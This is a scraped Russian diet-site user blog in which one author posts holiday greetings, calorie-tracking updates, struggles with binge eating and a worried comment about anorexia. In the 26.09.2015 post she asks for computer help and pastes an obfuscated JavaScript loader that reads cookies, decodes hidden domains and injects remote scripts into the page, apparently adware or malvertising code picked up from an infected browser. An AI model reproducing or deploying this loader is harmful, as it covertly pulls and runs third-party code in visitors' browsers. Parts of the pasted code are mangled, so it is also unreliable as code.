Ирина
07.01.2016 16:26
С Рождеством Христовым долгожданным!
Будет этот день пускай желанным,
Сказочным, чтоб все осуществилось,
Чтоб у каждого все получилось.
За дела хорошие держитесь,
Гнусных начинаний сторонитесь!
День чудесный, радостью увенчанный,
Ценностями он наполнен вечными!
 5 
 1
Ирина
31.12.2015 11:40
Мечтая о чуде, о счастье в семье, Мы ждем Новый год с пожеланием. Немного для близких, немного себе Удачи, здоровья, и всем понимания. Всех знакомых и друзей поздравляю с Новым, 2016 годом!!!!!!!! УРА, товарищи!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 2 
Ирина
29.11.2015 12:04
Вчера смотрела по телеку передачу про моделей. Были очень милые толстушки и анорексичные худышки.
Рассказывали и показывали родственников женщины, умершей от анорексии, осталась дочь.Задумалась я после передачи конкретно: ладно, худеют те, у кого вес шкалит, Но читаешь, что при росте 173, весе 53, народ хочет худеть. Это же болезнь!!!!!!!!!!!!! Кто как думает?
 5 
 7
Ирина
26.09.2015 11:42
Помогите, ни с того , ни с сего такие идут классные сообщения. Что делать? Я ничего не понимаю в компахwindow.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="21678",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/ajs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
Ирина
20.09.2015 10:51
Всем доброго  дня! Ура, ура ура! Сегодня ровно месяц, как я с МЗР! Минус 4,5 кг! Для меня это вообще супер, так как постоянно то одно выскакивало, то другое. Но результат есть. Пожелайте мне удачи, бегу на кухню, салатик строгать!
 7 
 6
Ирина
15.09.2015 10:20
Всем доброго дня! Не понимаю, как это происходит: с вечера все себе до следующего ужина запланирую,разложу по баночкам, беру на работу с собой. Уже почти полюбила себя, как советовали форумчане-перекусываю и обедаю не смотря ни на что. На лекции хожу с бутылкой воды, студенты уже не реагируют. Если есть  кто в кабинете-одним предлагаю со мной покушать или -мне доктор прописал.Но когда прихожу домой, нападает жор. день держусь, день-срываюсь, в результате вес стоит на месте. Посоветуйте, что делать????
 2 
 8
Ирина
10.09.2015 08:23
Всем доброго дня! Расстроилась за вчера до чертиков.Пошла на работу, даже ссобойки собрала: на перекусы и обед, но видно я так себя не люблю, что о еде и речи не было.Сначала лекции, в перерывах то заседание кафедры, то решение каких то насущных вопросов-не будешь же жевать и беседовать, а затем-прием зачета у 5 курса по преддипломной практике-с 15.00 до 20.00. Вышла, еле ноги волокла, а обедики так и остались на работе.Жуть! Вот и здоровое питание! Сегодня  ожидается такой же кошмар!
 4 
 17
Ирина
06.09.2015 12:17
Только поделилась радостью, что сбалансировала Б,Ж,У, И вчера день начала с бассейна.Пришла, позавтракала(творожок  с семечками, персиком), как через час приехала подруга- тортик, кофеек. Я в пределах разумного-маленький кусочек. Ну куда там, день задался-пошли в театр, затем в кафе и...............понеслось.Когда вечером попробовала все внести в дневник питания -волосы дыбом-сколько ккал лишних! На три дня хватит. Сегодня чувствую себя кошмарно! Надо  с этими срывами что-то делать!  
 4 
 4
Ирина
03.09.2015 20:52
Ура!,ура,ура!.Только сегодня, начиная с 20.08.15 у меня все зеленые полоски.Все получилось, а то- то жиры выскочат, то углеводы-недобор, белки-перебор, то водичка скачет!
 11 
 13
Ирина
31.08.2015 19:34
Всем привет! Вот и закончился мой первый рабочий день после отпуска. Да, прихожу к выводу,что придется брать на работу ссобойки. В столовой, когда мы отправились на обед, у поваров был шок.При выборе салата, штучного второго я просила все перевесить и непременно, чтобы я видела.Написано: биточек паровой из крицы-75г, по факту-60 еле натянуло, вот и верь им после этого. Когда я объяснила, что я не их контролирую, мне надо. для ведения дневника питания-все тупо ржали.Вот так!
 9 
 9
Лучшие рационы
Интересные блоги
Новые рецепты